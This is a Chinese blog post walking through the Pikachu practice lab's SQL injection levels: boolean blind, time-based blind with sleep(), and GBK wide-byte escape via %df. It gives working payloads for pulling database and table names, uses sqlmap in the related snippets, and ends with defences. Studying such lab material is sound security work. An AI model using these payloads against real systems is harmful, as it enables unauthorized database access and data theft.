pikachu~~~布尔,时间,宽字节盲注

最新推荐文章于 2025-06-12 08:10:00 发布
原创 最新推荐文章于 2025-06-12 08:10:00 发布 · 1.4k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#字符串 #sql

本文介绍了三种SQL注入方式。基于布尔的盲注,利用lenth()、substr()等函数取值运算;基于时间的盲注,借助sleep()函数判断;宽字节注入通过构造宽字符使单引号逃逸。还给出宽字节注入的防御方法,如指定字符集和转义。

目录

 

基于boolian的盲注

基于时间的盲注

wide byte注入

基于boolian的盲注

屏蔽了报错信息,只显示两种情况:正确和错误

输入单引号试探

输入and试一下

bool注入比较重要的是lenth()、substr()函数和ascii()函数这类取值和运算函数,substr()函数截取字符串的字母,通过ascii()函数转码成数字后就可以参与数学运算了。如:

select sustr(database(),1,1)>10

select ascii(sustr(database(),1,1))>10

select length(database())>10

开始注入:kobe' and ascii(substr(database(),1,1))>113#

若显示内容则后面表达式为真,否则为假

kobe' and ascii(substr(database(),1,1))=112#

 

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

基于时间的盲注

如果说基于bool的注入可以基于0或者1来判断注入,那基于时间的盲注就是啥也看不到,你无法从显示的不同来判断你的语句是否执行。这时可以引入基于时间的盲注。

发现输入’会立即回显报错

利用sleep()

输入kobe' and sleep(3)

发现延迟3秒显示,所以存在sql时间注入的漏洞

即后面语句猜测正确即延迟,不正确立即回显。

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

 

wide byte注入

 

输入注入字节后抓包

 

因为addslashes()函数的作用是在单引号等字符前加反斜杠('->\'),url编码后就是%5c%27.我们的payload的是【%df '】,在前面增加%df(%81-%fe之间都可),即%df%5c%27,此时数据库若使用GBK编码,则会认为%df%5c是一个宽字符,%27单引号便逃逸出来了。

order by字段查询,输入2时正常,输入3时报错,说明字段数为2

union 联合查询试下数据库:

查询表名:kobe%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

查询

'users'表名旁边需要单引号,所以可以用Burp将'users'进行转换为concat(char(39),char(117),char(115),char(101),char(114),char(115),char(39))

详细:https://blog.csdn.net/weixin_44426869/article/details/104341863?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162271214816780366593073%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=162271214816780366593073&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-9-104341863.first_rank_v2_pc_rank_v29&utm_term=pikachu%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4187

防御

对于宽字节编码,有一种最好的修补就是:

(1)使用mysql_set_charset(GBK)指定字符集

(2)使用mysql_real_escape_string进行转义

原理是,mysql_real_escape_string与addslashes的不同之处在于其会考虑当前设置的字符集,不会出现前面e5和5c拼接为一个宽字节的问题,但是这个“当前字符集”如何确定呢?

就是使用mysql_set_charset进行指定。

上述的两个条件是“与”运算的关系,少一条都不行。

pikachu——时间
Lollipop_zhi的博客
03-02 5167
如果是布尔,页面上会有0和1的变化,但是时间页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
Pikachu-Sql-Inject -基于boolian
guanrongl的专栏
10-03 1268
布尔入用到得SQL 语句select if(1=1,1,0) if()函数在mysql 是判断,第一个参数表达式,如果条件成立,会显示1,否则显示0。从前面已经知道有个用户 为 vince ,如果长度判断正确,回返回vince 这个用户,错误则显示不存在;if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0。2、不管是正确的输入,还是错误的输入,都只显示两种情况,true or false;第一个 1 ,代表查第一张表,第二个1,1 代表查第一个字母;
实验15:sql原理及基于boolean的
qq_44720671的博客
04-07 624
sql原理及基于boolean的 : 有时,后台用错误消息屏蔽方法屏蔽报错,无法根据报错信息来判断入,这种情况的入叫做分为based boolean(基于真假)和based time(基于时间) 两种 本章我们学习的是基于真假的——based boolean 特征: 1、无报错信息 2、无论对错只有两种情况(如:0或1) 3、正确时输入and 1=1或and 1=2...
pikachu(时间
ANYOUZHEN的博客
05-11 1535
pikachu基于时间 我们输入' 返回I don't care 我们输入anyouzhen sakura ,同样返回I don't care 我们可以利用sleep()函数进行判断,是否存在入点 我们输入 kobe' and sleep(5)# 查看网络,发现雀食存在5s的延迟,说明后面闭合后的内容被带入到数据库中去了 所以可以说明存在入点,这种入方式被称为时间 基于时间的延迟: kobe' and if((substr(database(),1,1))='p',sl
pikachu(bool)
ANYOUZHEN的博客
05-11 529
关于bool的原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容 由于进行处理,我们在页面输入框中输入‘时不会返回数据库报错内容 输入kobe’ and 1=1# 我们可以使用select语句去判断: select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思 select ascii(substr(database(),1,1)>112; 通过判断0或者1 通过多次查询,我
SQL入进阶之1宽字节入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4771
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节入攻击可以说是SQL入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询入攻击、布尔、报错入、时间这几种常见的SQL入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL入方式中,要翻牌的就是宽字节入。 原理讲解 接下来的讲解,将以问...
pikachu靶场 SQL-inject
Al_1的博客
10-03 1163
数字型入,字符型入,搜索型入,xx型入,增改入,删除入,请求头入,布尔时间宽字节
pikachu靶场通关
2301_80185313的博客
09-19 1669
pikachu靶场通关详解
SQL入:pikachu靶场中的SQL入通关
qq_68163788的博客
05-24 4374
SQL入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
通过sqlmap对pikachu平台进行
Ma79328的博客
12-28 2079
通过sqlmap对pikachu平台进行入 1.基于布尔 2.复制url 3.打开kali的终端,使用sqlmap进行入测试,使用命令sqlmap -u “进行入的URL” --current-db -batch列出当前的数据库,并自动选择YES 4.得到当前数据库名为pikachu 5.使用命令sqlmap -u “进行入的URL” -D pikachu -tables -batch,用已知pikachu数据库名加-tables列出当前的表 6. 得到该数据库的所有表单 7.使用
pikachu的(base on boolian
weixin_50339082的博客
06-15 1641
pikachu的(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少次数。 ...
pikachu 布尔
weixin_58358185的博客
10-26 1108
Pikachu布尔--思路
pikachu的(base on time)
weixin_50339082的博客
06-14 1246
pikachu的(base on time) 打开pikachu测试平台。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具(F12),控制台,选择网络。 输入 kobe’ and sleep(5)#,发现延迟5秒发送。 输入错误信息,发现sleep语句不执行 这样我们就可以写一个判断 kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)# 输入 kobe’ and if((subst
pikachu靶场通关笔记26 SQL入09-时间(base on time)
最新发布
mooyuan的网络安全博客
06-12 1266
本系列为通过《pikachu靶场通关笔记》的SQL入关卡(共10关)渗透集合,通过对时间(base on time)关卡源码的代码审计找到SQL入安全风险的真实原因,讲解时间(base on time)的原理并进行渗透实践,本文为SQL入09之时间(base on time)关卡的渗透部分。
pikachu——布尔
Lollipop_zhi的博客
03-02 6977
基于boolean的主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu时间
2301_79595769的博客
12-23 464
属于的一种,不同于布尔的是:布尔是需要有两个页面,一对一错来判断入是否正确,而时间可以在不返回正确错误页面的情况下进行准确入(错误正确只返回一个页面,布尔无法实施)在执行正确和错误的语句时均返回一个页面,无法通过回显判断入的是否正确。若立马响应,那就说明并不存在入点或者猜测的数字/字母错误。通过是否执行sleep函数来判断猜测的语句是否正确。若语句正确,执行sleep(5)使页面停顿5秒。随后输入kobe' and sleep(5)#一般是在布尔都行不通的情况下才使用时间
pikachu漏洞练习第四章节SQL入-based on time,原理练习收获
kaka6764的博客
09-02 459
如果说基于boolean的在页面上还可以看到0 or 1的回显的话,那么基于time的完全就啥都看不到了!但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认入!
Pikachu-Sql-Inject - 基于时间
guanrongl的专栏
10-04 720
mysql 里函数sleep() 是延时的意思,sleep(10)就是数据库延时10 秒返回内容。mysql 延时入用到的函数sleep() 、if()、substring()、select if(2>1,sleep(10),0) 2>1 这个部分就是你入要构造的SQL 语句。就是前端的基于time 的,什么错误信息都看不到,但是还可以通过特定的输入,判断后台的执行时间,从而确定入。构造payload;如果数据库长度大于1 ,延时五秒返回;根据这个条件,可以逐个爆破表;
pikachu
miaositekali的博客
02-21 463
pikachu
pikachu布尔
02-12
### 关于pikachu布尔漏洞利用 对于`pikachu`平台上的布尔攻击,其主要特征在于即使输入正确与否也不会引发明显的报错信息。当向应用程序发送请求时,在正常情况下页面会呈现一致的结果;然而通过附加特定条件(如`and 1=1` 或 `and 1=2`),可以根据响应的不同来推断后台数据库的状态[^2]。 为了验证是否存在这样的安全弱点,可以通过修改HTTP头部中的User-Agent字段为单引号的方式触发SQL语法异常,进而确认该处可能存在入风险[^4]。一旦确定了这一点,则可以进一步实施更复杂的逻辑操作以获取敏感数据或控制流路径。 #### 利用过程示例: 假设目标URL如下所示: ```plaintext http://example.com/pikachu-master/vul/sqli/sqli_blind.php?id=1 ``` 此时可构建如下测试载荷用于区分真假反馈机制: - 正常查询:`id=1 AND 1=1` - 错误查询:`id=1 AND 1=2` 如果两个条件下网页表现不同——例如前者能正常加载而后者无法访问或者内容发生变化——则表明这里很可能存在着布尔的可能性。 针对上述场景下的具体实践方法还包括但不限于使用IF语句配合时间延迟函数(如SLEEP())来进行逐字符猜测表名、列名乃至最终的数据值[^3]。这通常涉及到精心设计的嵌套表达式结构以及合理的错误处理策略,以便有效地绕过潜在的安全检测机制并逐步还原出完整的内部架构信息。 --- ### 防护措施建议 为了避免遭受此类攻击的影响,开发人员应当采取一系列预防性的编码习惯和技术手段: - **参数化查询**:始终采用预编译语句代替字符串拼接的方式来组装动态SQL指令,从而杜绝恶意代码入的机会。 - **最小权限原则**:确保Web应用所使用的数据库账户仅具备完成业务功能所需的最低限度的操作权利,减少因意外暴露而导致的危害范围。 - **输入校验与过滤**:严格审查所有来自客户端提交的信息,特别是那些可能影响到后端解析流程的部分,像特殊字符等应被适当转义或拒绝接收。 - **启用WAF(Web Application Firewall)**:部署专业的防火墙设备能够实时监控流量模式识别可疑行为,并及时阻断非法企图。 - **定期审计源码质量**:借助自动化工具扫描项目中存在的安全隐患点位,同时鼓励团队成员积极参与安全性培训课程提升整体意识水平。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值